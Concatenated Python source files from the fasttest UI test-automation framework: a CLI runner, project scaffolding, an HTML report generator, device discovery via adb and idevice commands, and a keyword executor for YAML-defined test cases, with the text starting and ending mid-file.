        "openUrl", "close", "submit", "back", "forward", "refresh",
        "queryDisplayed", "queryNotDisplayed",
        "contextClick", "doubleClick", "holdClick",
        "dragDrop", "dragDropByOffset", "moveByOffset",
        "moveToElement", "moveToElementWithOffset",
        "sendKeys", "clear",
        "maxWindow", "minWindow", "fullscreenWindow",
        "deleteAllCookies", "deleteCookie", "addCookie",
        "switchToFrame", "switchToDefaultContent", "switchToParentFrame",
        "switchToWindow", "setWindowSize", "setWindowPosition",
        "executeScript", "matchImage",
        "$.executeScript", "$.saveScreenshot",
        "$.isSelected", "$.isDisplayed", "$.isEnabled",
        "$.getSize", "$.getLocation", "$.getRect", "$.getAttribute",
        "$.getTagName", "$.getCssProperty", "$.getName", "$.getTitle",
        "$.getCurrentUrl", "$.getCurrentWindowHandle", "$.getWindowHandles",
        "$.getCookies", "$.getCookie",
        "$.getWindowPosition", "$.getWindowSize",
    }
    extra = web_keywords if driver == 'selenium' else app_keywords
    return list(common_keywords | extra)
|
Hanlen520/fasttest | fasttest/fasttest_runner.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import sys
import getopt
import traceback
from concurrent import futures
from fasttest.version import VERSION
from fasttest.project import *
def _usage():
    """Print the fasttest CLI help text and terminate the process."""
    print('')
    print(' usage: fasttest [-h|-v|] [arg] ...')
    print('')
    print(' options:')
    print('')
    print(' -h, --help show help screen and exit.')
    print(' -V, --Version show version.')
    print(' -i, --init specify a project name and create the project.')
    print(' -r, --run specify the project path and run the project.')
    print(' -w, --workers specify number of threads.')
    print('')
    sys.exit()
def _init_project(dir):
try:
if not dir:
print('Please enter a project name...')
sys.exit()
dirs = ['Common/Android', 'Common/iOS', 'Common/Selenium', 'Resource', 'Scripts', 'TestCase']
for dir_ in dirs:
path = os.path.join(dir, dir_)
print('create directory: {}'.format(path))
os.makedirs(path)
config_path = os.path.join(dir, 'config.yaml')
with open(config_path, "w") as f:
print('create file: {}'.format(config_path))
config = "driver: 'appium'\n" \
"reStart: True\n" \
"saveScreenshot: False\n" \
"timeOut: 10\n" \
"desiredCapabilities:\n" \
" platformName: 'Android'\n" \
" udid: 'device_id'\n" \
" appPackage: 'com.android.mobile'\n" \
" appActivity: 'com.android.mobile.Launcher'\n" \
" automationName: 'Appium'\n" \
" deviceName: 'HUWWEI P40 Pro'\n" \
" noReset: True\n" \
"testcase:\n" \
" - TestCase/case.yaml"
f.write(config)
data_path = os.path.join(dir, 'data.yaml')
with open(data_path, 'w') as f:
print('create file: {}'.format(data_path))
config = "variable:\n" \
" userid: 'admin'\n" \
" password: '<PASSWORD>'\n" \
"resource:\n" \
" logo: 'Resource/logo.png'\n" \
"keywords:\n" \
" - 'ScriptsTest'\n"
f.write(config)
common_path = os.path.join(dir, 'Common', 'common.yaml')
with open(common_path, "w") as f:
print('create file: {}'.format(common_path))
common = "CommonTest:\n" \
" description: 'common test'\n" \
" input: [value]\n" \
" output: []\n" \
" steps:\n" \
" - for ${i} in ${value}:\n" \
" - if ${i} == 3:\n" \
" - break"
f.write(common)
case_path = os.path.join(dir, 'TestCase', 'case.yaml')
with open(case_path, "w") as f:
print('create file: {}'.format(case_path))
case = "module: test_module\n" \
"skip: False\n" \
"description: 'this is a test case'\n" \
"steps:\n" \
" - ${t1} = $.id(1+2*3)\n\n" \
" - ${t2} = 6\n\n" \
" - assert ${t1} > ${t2}\n\n" \
" - ${ls} = ScriptsTest(${t2})\n\n" \
" - call CommonTest(${ls})"
f.write(case)
scripts_path = os.path.join(dir, 'Scripts', 'case.py')
with open(scripts_path, "w") as f:
print('create file: {}'.format(scripts_path))
scripts = '#!/usr/bin/env python3\n' \
'# -*- coding: utf-8 -*-\n\n' \
'def ScriptsTest(value):\n\n' \
' return [1,2,3,4,5,value]'
f.write(scripts)
print('create project successfully.')
except Exception as e:
raise e
def _start_project(workers, path):
    """Run the project at *path*.

    Args:
        workers: number of parallel runs; 1 (or less) runs in-process.
        path: project root directory.

    Returns:
        A single result dict when workers <= 1, otherwise a list with one
        result dict per worker (workers that raised are omitted).
    """
    if workers <= 1:
        project = Project(path=path)
        result = project.start()
        return result
    else:
        result_list = []
        # max_workers=workers: the executor's default pool size can be
        # smaller than the requested worker count, which would silently
        # serialize the runs.
        with futures.ThreadPoolExecutor(max_workers=workers) as t:
            worker_list = []
            for index in range(workers):
                run_info = {
                    'index': index,
                    'workers': workers,
                    'path': path
                }
                worker_list.append(t.submit(_run_project, run_info))
            for f in futures.as_completed(worker_list):
                if f.result() is not None:
                    result_list.append(f.result())
                if f.exception():
                    print(f.exception())
        return result_list
def _run_project(run_info):
    """Worker entry point: run one Project slice described by *run_info*.

    *run_info* carries 'index', 'workers' and 'path'. Returns the project's
    result dict, or None when the run raised (the traceback is printed).
    """
    try:
        project = Project(
            index=run_info['index'],
            workers=run_info['workers'],
            path=run_info['path'],
        )
        return project.start()
    except Exception:
        traceback.print_exc()
        return None
def main():
    '''
    Command-line entry point: parse CLI options, then either create a new
    project scaffold (-i) or run an existing project (-r), optionally with
    several parallel workers (-w).
    :return:
    '''
    try:
        opts, args = getopt.getopt(sys.argv[1:], 'hVi:r:w:', ['help', 'Version', 'init=', 'run=', 'workers='])
    except:
        _usage()
    # Defaults: run the project in the current directory with one worker.
    project_path = '.'
    workers = 1
    for o, a in opts:
        if o in ('-h', '--help'):
            _usage()
        elif o in ('-V', '--Version'):
            print(VERSION)
            sys.exit()
        elif o in ('-i', '--init'):
            _init_project(a)
            sys.exit()
        elif o in ('-r', '--run'):
            project_path = a
        elif o in ('-w', '--workers'):
            workers = int(a)
        else:
            _usage()
    if not os.path.isdir(project_path):
        print('No such directory: {}'.format(project_path))
        _usage()
    # NOTE(review): 'time' is not imported in this module directly; it is
    # presumably re-exported by 'from fasttest.project import *' — confirm.
    start_time = time.time()
    result = _start_project(workers, project_path)
    end_time = time.time()
    print('run time: {}s'.format(int(end_time-start_time)))
    # Multi-worker runs return a list of result dicts; print each summary,
    # skipping the bulky per-case 'result' payload.
    if isinstance(result, list):
        for r in result:
            print('\n')
            for k, v in r.items():
                if k == 'result':
                    continue
                print('{}: {}'.format(k, v))
    else:
        for k, v in result.items():
            if k == 'result':
                continue
            print('{}: {}'.format(k, v))
if __name__ == '__main__':
    main()
Hanlen520/fasttest | fasttest/runner/run_case.py | <reponame>Hanlen520/fasttest
from fasttest.common import Var
from fasttest.runner.test_case import TestCase
from fasttest.drivers.driver_base_app import DriverBaseApp
from fasttest.drivers.driver_base_web import DriverBaseWeb
from fasttest.runner.case_analysis import CaseAnalysis
class RunCase(TestCase):
    """unittest-style wrapper that executes one parsed YAML test case.

    Relies on framework globals in Var (driver kind, re_start flag) to decide
    whether to (re)launch the app or browser session around each case.
    """
    def setUp(self):
        # Respect the case-level 'skip' flag from the YAML definition.
        if self.skip:
            self.skipTest('skip')
        if Var.re_start:
            # Non-selenium drivers are mobile (appium); selenium gets a
            # fresh WebDriver session instead.
            if Var.driver != 'selenium':
                DriverBaseApp.launch_app(None)
            else:
                DriverBaseWeb.createSession()
    def testCase(self):
        # Walk the parsed steps and execute them one by one.
        case = CaseAnalysis()
        case.iteration(self.steps)
    def tearDown(self):
        if Var.re_start:
            try:
                if Var.driver != 'selenium':
                    DriverBaseApp.close_app(None)
                else:
                    DriverBaseWeb.quit()
            except:
                # Best-effort teardown: never fail the case on close errors.
                pass
|
Hanlen520/fasttest | fasttest/result/html_result.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import re
import sys
import time
import shutil
class Template_mixin(object):
"""
Define a HTML template for report customerization and generation.
Overall structure of an HTML report
HTML
+------------------------+
|<html> |
| <head> |
| |
| STYLESHEET |
| +----------------+ |
| | | |
| +----------------+ |
| |
| </head> |
| |
| <body> |
| |
| HEADING |
| +----------------+ |
| | | |
| +----------------+ |
| |
| REPORT |
| +----------------+ |
| | | |
| +----------------+ |
| |
| ENDING |
| +----------------+ |
| | | |
| +----------------+ |
| |
| </body> |
|</html> |
+------------------------+
"""
HTML_TMPL = r'''
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>测试报告</title>
<link rel="stylesheet" type="text/css" href="resource/css.css">
<script type="text/javascript" src="http://libs.baidu.com/jquery/2.1.1/jquery.min.js"></script>
<script src="resource/js.js"></script>
</head>
<body>
<div class="root">
{heading}
{tabdiv}
</div>
</body>
</html>
'''
# 测试汇总
HEADING_TMPL = r'''
<div class="result_css_title">
<h2 style="color: white;text-align: center;line-height: 65px">{title}</h2>
</div>
<div class="result_css_head" style="height: 240px">
<div class="result_css_head_title">Summarization</div>
<div style="height: 210px;border: 1px solid rgb(220,220,220); background-color: white">
<p class="result_css_text">Total:{total}</p>
<p class="result_css_text">Success:{success}</p>
<p class="result_css_text">Failure:{failure}</p>
<p class="result_css_text">Error:{error}</p>
<p class="result_css_text">Skipped:{skipped}</p>
<p class="result_css_text">StartTime:{startTime}</p>
<p class="result_css_text">Duration:{duration}</p>
</div>
</div>
'''
# 详细数据
TABDIV_TMPL = r'''
<div class="result_css_tabdiv" style="height: auto">
<div class="result_css_head_title">Details</div>
<div style="height:auto;border: 1px solid rgb(220,220,220); background-color: white">
<table class="result_css_table" cellspacing="0">
<tr>
<th class="result_css_th" width="20%%">CaseName</th>
<th class="result_css_th" width="30%%">Description</th>
<th class="result_css_th" width="20%%">StartTime</th>
<th class="result_css_th" width="10%%">Duration</th>
<th class="result_css_th" width="10%%">Status</th>
<th class="result_css_th" width="10%%">Open/Close</th>
</tr>
{trlist}
</table>
</div>
</div>
'''
# module_name
MODULE_NAME = r'''
<tr>
<td class="result_css_module_td" colspan="2" style=" text-align:left; text-indent: 10px;">{module_name}</td>
<td class="result_css_module_td" colspan="3"><span class="result_css_success result_css_status"> success:{success} </span> | <span class="result_css_failure result_css_status"> failure:{failure} </span> | <span class="result_css_error result_css_status"> error:{error} </span> | <span class="result_css_skipped result_css_status"> skipped:{skipped} </span></td>
<td class="result_css_module_name" data-tag='module_name_{tag_module_name}'>Open</td>
</tr>
'''
# case
CASE_TMPL = r'''
<tr module-data-tag='module_name_{module_name}' style="display: none">
<td class="result_css_module_td result_css_{b_color}" style=" text-align:left; text-indent: 20px;">{casename}</td>
<td class="result_css_module_td result_css_{b_color}" style=" text-align:left; text-indent: 5px;">{description}</td>
<td class="result_css_module_td result_css_{b_color}">{startTime}</td>
<td class="result_css_module_td result_css_{b_color}">{duration}</td>
<td class="result_css_module_td result_css_{b_color}">{status}</td>
<td class="result_css_module_td_view result_css_{b_color}" data-tag='module_td_view_{module}_{dataId}'>Open</td>
</tr>
'''
# case details
CASE_DETA_NOT_SNAPSHOT = r'''
<tr module-td-data-tag="module_td_view_{module_name}_{dataId}" style="display: none">
<td class="result_css_module_deta" colspan="2" style="border-right: 0">
<div class="result_css_errordiv">
<h3 style="margin-bottom: 10px">Steps</h3>
<pre class="result_css_errorp" style="white-space: pre-wrap;overflow-wrap: break-word;margin-top: 0">{steplist}</pre>
</div>
</td>
<td class="result_css_module_deta" colspan="4">
<div class="result_css_errordiv">
<h3 style="margin-bottom: 10px">Logs</h3>
<pre class="result_css_errorp" style="white-space: pre-wrap;overflow-wrap: break-word;margin-top: 0">{errlist}</pre>
</div>
</td>
</tr>
'''
CASE_DETA_SNAPSHOT = r'''
<tr module-td-data-tag="module_td_view_{module_name}_{dataId}" style="display: none">
<td class="result_css_module_deta" colspan="6" style="border-right: 0">
<div class="result_css_errordiv">
<h3 style="margin-bottom: 10px">Steps</h3>
{steplist}
</div>
</td>
</tr>
'''
CASE_SNAPSHOT_DIV = r'''
<div class="result_css_Stepsdetails">
<div class="result_css_steps" style="display: inline-block">
<pre class="result_css_StepsdetailsPre_duration">{runtime} | </pre>
<pre class="result_css_StepsdetailsPre {status}">{steps}</pre>
</div>
<div class="img_errorp" style="display: none;">
<img class="result_css_img" src="{image}">
</div>
</div>
'''
CASE_NOT_SNAPSHOT_DIV = r'''
<div class="result_css_Stepsdetails">
<div class="result_css_steps" style="display: inline-block">
<pre class="result_css_StepsdetailsPre_duration">{runtime} | </pre>
<pre class="result_css_StepsdetailsPre {status}">{steps}</pre>
</div>
</div>
'''
CASE_ERROR_DIV = r'''
<div class="result_css_Stepsdetails">
<div class="result_css_steps" style="display: inline-block">
<pre class="result_css_StepsdetailsPre_duration">{runtime} | </pre>
<pre class="result_css_StepsdetailsPre {status}">{steps}</pre>
</div>
<div class="img_errorp" style="display: none;">
<img class="result_css_img" src="{image}">
<pre class="result_css_errorp" style="white-space: pre-wrap;overflow-wrap: break-word;">{errlist}</pre>
</div>
</div>
'''
CASE_NOT_ERROR_DIV = r'''
<div class="result_css_Stepsdetails">
<div class="result_css_steps" style="display: inline-block">
<pre class="result_css_StepsdetailsPre_duration">{runtime} | </pre>
<pre class="result_css_StepsdetailsPre {status}">{steps}</pre>
</div>
<div class="img_errorp" style="display: none;">
<pre class="result_css_errorp" style="white-space: pre-wrap;overflow-wrap: break-word;">{errlist}</pre>
</div>
</div>
'''
# Fallbacks used by HTMLTestRunner when no title/description is supplied.
DEFAULT_TITLE = 'Unit Test Report'
DEFAULT_DESCRIPTION = ''
class HTMLTestRunner(Template_mixin):
def __init__(self, stream=sys.stdout, verbosity=1, title=None, description=None):
self.stream = stream
self.verbosity = verbosity
self.title = title if title else self.DEFAULT_TITLE
self.description = description if description else self.DEFAULT_DESCRIPTION
def generate_report(self, result):
heading = self._generate_heading(result)
report = self._generate_tabdiv(result)
tabdiv = self.TABDIV_TMPL.format(
trlist = report
)
output = self.HTML_TMPL.format(
heading = heading,
tabdiv = tabdiv
)
resource = os.path.join(os.path.split(os.path.abspath(__file__))[0], "resource")
shutil.copy(os.path.join(resource,"css.css"), os.path.join(result.report,'resource'))
shutil.copy(os.path.join(resource,"js.js"), os.path.join(result.report,'resource'))
self.stream.write(output.encode('utf-8'))
def _generate_heading(self, report):
if report:
heading = self.HEADING_TMPL.format(
title = self.title,
total = report.total,
success = report.successes,
failure = report.failures,
error = report.errors,
skipped = report.skipped,
startTime = report.startTime,
duration = report.duration
)
return heading
def _generate_tabdiv(self, result):
'''
解析结果
:param result:
:return:
'''
table_lsit = []
for module_name, module_list in result.result.items():
success = 0
failure = 0
error = 0
skipped = 0
cls_list = []
for test_info in module_list:
# case模块
case_module = self._generate_case(test_info)
cls_list.append(case_module)
# 具体case
status = test_info.status
if status != 3: # skip
case_deta = self._generate_case_deta(test_info)
cls_list.append(case_deta)
# 统计结果
if status == 0:
success += 1
elif status == 1:
failure += 1
elif status == 2:
error += 1
elif status == 3:
skipped += 1
module_name = self.MODULE_NAME.format(
module_name = module_name,
success = success,
failure = failure,
error = error,
skipped = skipped,
tag_module_name = module_name
)
table_lsit.append(module_name)
for tr in cls_list:
table_lsit.append(tr)
tr_ = ''
for tr in table_lsit:
tr_ = tr_ + tr
return tr_
def _generate_case(self, test_info):
'''
module 样式
:param testinfo:
:return:
'''
status_list = ['success', 'failure', 'error', 'skipped']
casename = test_info.caseName
status = status_list[test_info.status]
description = test_info.description
startTime = test_info.startTime
duration = test_info.duration
dataId = test_info.dataId
module_name = test_info.moduleName
caseinfo = self.CASE_TMPL.format(
module_name=module_name,
casename=casename,
description=description,
startTime=startTime,
duration=duration,
status=status,
module=module_name,
dataId=dataId,
b_color=status
)
return caseinfo
def _generate_case_deta(self, test_info):
'''
具体case
:param testinfo:
:return:
'''
dataId = test_info.dataId
module_name = test_info.moduleName
err = '\n' + test_info.err if test_info.err else 'Nothing'
steps = ""
if os.path.exists(test_info.snapshotDir):
for key in sort_string(test_info.steps):
value = test_info.steps[key]
run_time = value['duration']
step = value['step'].replace('\n', '')
if value['result'] != '':
step = '{} --> {}'.format(value['step'], value['result']).replace('\n', '')
image_path = value['snapshot'].split(test_info.report)[-1]
image_path = image_path.lstrip(os.sep)
if value['status']:
if os.path.isfile(value['snapshot']):
case_snapshot = self.CASE_SNAPSHOT_DIV.format(
status='result_css_successfont',
runtime=run_time,
steps=step,
image=image_path
)
else:
case_snapshot = self.CASE_NOT_SNAPSHOT_DIV.format(
status='result_css_successfont',
runtime=run_time,
steps=step
)
else:
if os.path.isfile(value['snapshot']):
case_snapshot = self.CASE_ERROR_DIV.format(
status='result_css_errorfont',
runtime=run_time,
steps=step,
image=image_path,
errlist=err
)
else:
case_snapshot = self.CASE_NOT_ERROR_DIV.format(
status='result_css_errorfont',
runtime=run_time,
steps=step,
errlist=err
)
steps = steps + case_snapshot
casedeta = self.CASE_DETA_SNAPSHOT.format(
module_name=module_name,
dataId=dataId,
steplist=steps,
)
else:
casedeta = self.CASE_DETA_NOT_SNAPSHOT.format(
module_name=module_name,
dataId=dataId,
steplist=steps,
errlist=err
)
return casedeta
def embedded_numbers(s):
    """Split *s* into alternating text/number chunks for natural sorting.

    Example: 'step12a' -> ['step', 12, 'a'].
    """
    chunks = re.split(r'(\d+)', s)
    # Odd indexes hold the digit groups captured by the regex; convert them
    # so they compare numerically instead of lexicographically.
    return [int(chunk) if index % 2 else chunk
            for index, chunk in enumerate(chunks)]
def sort_string(lst):
    """Return *lst* sorted in natural (human) order, e.g. 'x2' before 'x10'."""
    return sorted(lst, key=embedded_numbers)
|
Hanlen520/fasttest | fasttest/drivers/appium/__init__.py | <reponame>Hanlen520/fasttest
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from fasttest.drivers.appium.driver_appium import AndroidDriver, iOSDriver
__all__ = ['AndroidDriver','iOSDriver']
|
Hanlen520/fasttest | fasttest/utils/devices_utils.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import re
import platform
class DevicesUtils(object):
    """Resolve the target test device and a human-readable device label.

    Android devices are discovered via adb; iOS devices via the
    libimobiledevice tools and the instruments simulator list.
    """
    def __init__(self, platformName, udid):
        # platformName: 'Android' or 'iOS' (case-insensitive).
        # udid: preferred device serial; when empty, the first attached
        # device is selected automatically.
        self._platformName = platformName
        self._udid = udid
    def device_info(self):
        """Pick the device to test on.

        Returns:
            tuple(str, str): (udid, device_type) where device_type is
            '<manufacturer>_<model>' on Android and the device name on iOS.

        Raises:
            Exception: if the requested udid is not attached, no device is
                found, or the platform is neither Android nor iOS.
        """
        if self._platformName.lower() == 'android':
            devices = self.get_devices()
            # Validate the requested serial or auto-select the first device.
            if self._udid and (self._udid not in devices):
                raise Exception("device {} not found!".format(self._udid))
            elif not self._udid and devices:
                self._udid = devices[0]
            elif not self._udid:
                raise Exception("Can‘t find device!")
            # Same getprop dump on both hosts; only the filter command differs.
            if platform.system() == "Windows":
                pipe = os.popen("adb -s {} shell getprop | findstr product".format(self._udid))
            else:
                pipe = os.popen("adb -s {} shell getprop | grep product".format(self._udid))
            result = pipe.read()
            # Parse '[ro.product.manufacturer]: [value]' style lines.
            manufacturer = "None" if not result else \
                re.search(r"\[ro.product.manufacturer\]:\s*\[(.[^\]]*)\]", result).groups()[0]
            model = "None" if not result else \
                re.search(r"\[ro.product.model\]:\s*\[(.[^\]]*)\]", result).groups()[0].split()[-1]
            device_type = "{}_{}".format(manufacturer, model).replace(" ", "_")
        elif self._platformName.lower() == 'ios':
            devices = self.get_devices('idevice_id -l')
            simulator_devices = self.get_devices('instruments -s Devices')
            # NOTE(review): 'devices or simulator_devices' only checks
            # membership in the first non-empty list — a udid present only in
            # the simulator list is rejected when physical devices exist;
            # confirm this is intended.
            if self._udid and (self._udid not in (devices or simulator_devices)):
                raise Exception("device {} not found!".format(self._udid))
            elif not self._udid and devices:
                self._udid = devices[0]
            elif not self._udid:
                raise Exception("Can‘t find device!")
            if self._udid in devices:
                # Physical device: ask it for its user-visible name.
                DeviceName = os.popen('ideviceinfo -u {} -k DeviceName'.format(self._udid)).read()
                if not DeviceName:
                    DeviceName = 'iOS'
                device_type = DeviceName.replace(' ', '_')
            else:
                # Simulator: fall back to the bare platform name.
                device_type = self._platformName
        else:
            raise Exception("Test Platform must be Android or iOS!")
        return self._udid,device_type
    def get_devices(self,cmd=''):
        """List candidate device identifiers.

        Args:
            cmd: shell command used for iOS lookups; ignored for Android
                ('adb devices' is always used).

        Returns:
            list[str]: device serials/udids (may be empty).
        """
        if self._platformName.lower() == 'android':
            pipe = os.popen("adb devices")
            deviceinfo = pipe.read()
            # Drop the 'List of devices attached' header line and blanks.
            devices = deviceinfo.replace('\tdevice', "").split('\n')
            devices.pop(0)
            while "" in devices:
                devices.remove("")
        else:
            pipe = os.popen(cmd)
            deviceinfo = pipe.read()
            # 'instruments -s Devices' wraps udids in [brackets];
            # 'idevice_id -l' prints one bare udid per line.
            r = re.compile(r'\[(.*?)\]', re.S)
            devices = re.findall(r, deviceinfo)
            devices = devices if devices else deviceinfo.split('\n')
            while "" in devices:
                devices.remove("")
        return devices
|
Hanlen520/fasttest | fasttest/runner/action_executor_base.py | <gh_stars>10-100
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import time
import copy
from typing import Iterable
from fasttest.common import Var, log_info, log_error
class ActionExecutorBase(object):
    """Driver-agnostic implementation of the built-in test-case keywords.

    Each built-in keyword maps to a `_<keyword>` method dispatched by
    `_action_executor`; user-defined keywords from the project's Scripts
    directory are run by `_new_action_executo`.
    """

    def _import(self):
        """Build `from Scripts.<mod> import *` statements for every user
        script under <root>/Scripts, skipping __init__, hidden and compiled
        files. Errors are logged, not raised."""
        file_list = []
        try:
            for rt, dirs, files in os.walk(os.path.join(Var.root, "Scripts")):
                for f in files:
                    if f == "__init__.py" or f.endswith(".pyc") or f.startswith(".") or not f.endswith('.py'):
                        continue
                    file_list.append(f'from Scripts.{f[:-3]} import *')
        except Exception as e:
            log_error(' {}'.format(e), False)
        return file_list

    def _out(self, key, result):
        """Log *result* under *key*, expanding lists and dicts one entry per
        line."""
        if isinstance(result, list):
            log_info(f' <-- {key}: {type(result)}')
            for item in result:
                log_info(' - {}'.format(item))
        elif isinstance(result, dict):
            log_info(f' <-- {key}: {type(result)}')
            for k, v in result.items():
                log_info(' - {}: {}'.format(k, v))
        else:
            log_info(f' <-- {key}: {type(result)} {result}')

    def _getParms(self, action, index=0, ignore=False):
        """Return positional parameter *index* of *action*.

        :param ignore: when True, return None for a missing parameter
            instead of raising.
        :raises TypeError: when the parameter is absent and ignore is False.
        """
        parms = action.parms
        if len(parms) <= index or not len(parms):
            if ignore:
                return None
            raise TypeError('missing {} required positional argument'.format(index + 1))
        return parms[index]

    def _eval_condition(self, action):
        """Shared body of _if/_elif/_while/_assert: evaluate the first
        parameter as a python expression and log its truthiness.

        NOTE: eval() runs test-case text; inputs are trusted project files,
        never untrusted external data.
        """
        expression = self._getParms(action, 0).replace('\n', '')
        result = eval(expression)
        log_info(' <-- {}'.format(bool(result)))
        return result

    def _sleep(self, action):
        """Keyword `sleep`: pause for the given number of seconds."""
        time.sleep(float(self._getParms(action, 0)))

    def _setVar(self, action):
        """Keyword `setVar`: store key/value into the global variable table."""
        key = self._getParms(action, 0)
        values = self._getParms(action, 1)
        Var.global_var[key] = values

    def _getVar(self, action):
        """Keyword `getVar`: read a value from the global variable table,
        or None when unset."""
        key = self._getParms(action, 0)
        if Var.global_var and key in Var.global_var:
            return Var.global_var[key]
        return None

    def _getLen(self, action):
        """Keyword `getLen`: length of the first parameter, 0 for falsy
        values."""
        value = self._getParms(action, 0)
        if value:
            return len(value)
        return 0

    def _break(self, action):
        """Keyword `break`: signal loop termination to the case runner."""
        return True

    def _if(self, action):
        """Keyword `if`: evaluate the condition expression."""
        return bool(self._eval_condition(action))

    def _elif(self, action):
        """Keyword `elif`: evaluate the condition expression."""
        return bool(self._eval_condition(action))

    def _else(self, action):
        """Keyword `else`: always taken."""
        return True

    def _while(self, action):
        """Keyword `while`: evaluate the loop condition expression."""
        return bool(self._eval_condition(action))

    def _for(self, action):
        """Keyword `for`: validate the iterable and return the loop spec
        as {'key': loop-variable-name, 'value': iterable}."""
        items = self._getParms(action, 0)
        value = action.value
        if not isinstance(items, Iterable):
            raise TypeError("'{}' object is not iterable".format(items))
        return {'key': value, 'value': items}

    def _assert(self, action):
        """Keyword `assert`: fail the step when the expression is falsy."""
        assert self._eval_condition(action)

    def _setTimeout(self, action):
        """Keyword `setTimeout`: update the global element-wait timeout."""
        Var.time_out = int(self._getParms(action, 0))

    def _id(self, action):
        """Keyword `id`: evaluate the expression and return its value
        without logging."""
        expression = self._getParms(action, 0).replace('\n', '')
        return eval(expression)

    def _call(self, action):
        """Keyword `call`: run a user-defined common function with the
        given arguments bound to its declared inputs."""
        parms = action.parms
        func = action.func
        if not func in Var.common_func.keys():
            raise NameError("name '{}' is not defined".format(func))
        if len(Var.common_func[func].input) != len(parms):
            raise TypeError('{}() takes {} positional arguments but {} was given'.format(func, len(
                Var.common_func[func].input), len(parms)))
        common_var = dict(zip(Var.common_func[func].input, parms))
        try:
            from fasttest.runner.case_analysis import CaseAnalysis
            case = CaseAnalysis()
            case.iteration(Var.common_func[func].steps, '{} '.format(action.style), common_var)
        except Exception as e:
            # A failing step inside the called function must also mark this
            # `call` action as failed; flag it for the report decorators.
            Var.exception_flag = True
            raise e

    def _variable(self, action):
        """Dispatch a `$.<func>`-style invocation (or a plain value) and log
        the result."""
        func = action.func
        if func and func.startswith('$.'):
            func_ = getattr(self, '_{}'.format(func[2:]))
            result = func_(action)
        elif func:
            new_action = action.copy()  # todo
            new_action['key'] = action.func
            result = self._new_action_executo(new_action)
        else:
            result = self._getParms(action, 0)
        self._out(action.name, result)
        return result

    def _action_executor(self, action):
        """Dispatch a built-in keyword to its `_<keyword>` method."""
        try:
            func = getattr(self, '_{}'.format(action.key))
        except Exception:
            raise NameError("keyword '{}' is not defined".format(action.key))
        return func(action)

    def _new_action_executo(self, action, output=True):
        """Run a user-defined keyword from the project's Scripts directory.

        (The method name keeps its historical typo for backward
        compatibility with subclasses and callers.)
        """
        # Import every user script into this frame so eval() can resolve
        # the keyword by name through locals().
        statements = self._import()
        for statement in statements:
            exec(statement)
        parms = None
        for index, par in enumerate(action.parms):
            if not parms:
                parms = 'action.parms[{}]'.format(index)
                continue
            parms = '{}, action.parms[{}]'.format(parms, index)
        if not parms:
            result = eval('locals()[action.key]()')
        else:
            result = eval('locals()[action.key]({})'.format(parms))
        if result and output:
            self._out(action.key, result)
        return result
|
Hanlen520/fasttest | fasttest/utils/yaml_utils.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import yaml
from fasttest.common import Dict
def analytical_file(path):
    '''
    Parse a YAML file into the project Dict type.
    :param path: path of the YAML file to load
    :return: Dict with the file's top-level keys (empty for an empty file)
    '''
    with open(path, "r", encoding='utf-8') as stream:
        content = yaml.load(stream, Loader=yaml.FullLoader)
    parsed = Dict()
    if content:
        for item_key, item_value in content.items():
            parsed[item_key] = item_value
    return parsed
|
Hanlen520/fasttest | fasttest/project.py | <reponame>Hanlen520/fasttest<gh_stars>10-100
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import sys
import time
import math
import unittest
import threading
from fasttest.common import *
from fasttest.utils import *
from fasttest.keywords import keywords
from fasttest.runner.run_case import RunCase
from fasttest.drivers.driver_base_app import DriverBaseApp
from fasttest.drivers.driver_base_web import DriverBaseWeb
from fasttest.result.test_runner import TestRunner
class Project(object):
    """One test-run worker.

    Construction parses the project layout (config.yaml, testcase files,
    Common functions, data.yaml) and builds the unittest suite; start()
    launches the driver server, runs the suite and reports failures.
    """
    def __init__(self, index=0, workers=1, path='.'):
        # index: zero-based worker number (selects udid / testcase slice)
        # workers: total number of parallel workers
        # path: project root directory
        self._index = index
        self._workers = workers
        self._root = path
        self._init_project()
        self._init_config()
        self._init_logging()
        self._analytical_testcase_file()
        self._analytical_common_file()
        self._init_data()
        self._init_testcase_suite()
    def _init_project(self):
        """Validate the project root, extend sys.path and reset the global
        Var containers shared across the run."""
        if not os.path.isdir(self._root):
            raise Exception('No such directory: {}'.format(self._root))
        if self._root == '.':
            self._root = os.getcwd()
        Var.root = self._root
        sys.path.append(Var.root)
        sys.path.append(os.path.join(Var.root, 'Scripts'))
        Var.global_var = Dict()
        Var.extensions_var = Dict()
        Var.common_var = Dict()
        Var.common_func = Dict()
    def _init_config(self):
        """Load config.yaml, mirror its settings into Var and validate the
        driver/browser selection."""
        self._config = analytical_file(os.path.join(Var.root, 'config.yaml'))
        Var.driver = self._config.driver
        Var.re_start = self._config.reStart
        Var.save_screenshot = self._config.saveScreenshot
        Var.time_out = self._config.timeOut
        Var.test_case = self._config.testcase
        Var.desired_caps = Dict()
        for configK, configV in self._config.desiredCapabilities.items():
            Var.desired_caps[configK] = configV
        if not Var.driver or Var.driver.lower() not in ['appium', 'macaca', 'selenium']:
            raise ValueError('Missing/incomplete configuration file: config.yaml, No driver type specified.')
        if not Var.time_out or not isinstance(Var.time_out, int):
            # Default element-wait timeout in seconds.
            Var.time_out = 10
        if Var.driver != 'selenium':
            if not Var.desired_caps.platformName:
                raise ValueError('Missing/incomplete configuration file: config.yaml, No platformName type specified.')
            DriverBaseApp.init()
        else:
            if not Var.desired_caps.browser or Var.desired_caps.browser not in ['chrome', 'safari', 'firefox', 'ie', 'opera', 'phantomjs']:
                raise ValueError('browser parameter is illegal!')
    def _init_logging(self):
        """Resolve the target device (or browser) for this worker and
        create the per-run report directory."""
        if Var.driver != 'selenium':
            # Re-resolve the udid for this worker.
            if self._workers > 1:
                # Parallel run: udid must be a list with one entry per worker.
                if isinstance(Var.desired_caps.udid, list):
                    if not Var.desired_caps.udid:
                        raise Exception('Can‘t find device, udid("{}") is empty.'.format(Var.desired_caps.udid))
                    if self._index >= len(Var.desired_caps.udid):
                        raise Exception('the number of workers is larger than the list of udid.')
                    if not Var.desired_caps.udid[self._index]:
                        raise Exception('Can‘t find device, udid("{}") is empty.'.format(Var.desired_caps.udid[self._index]))
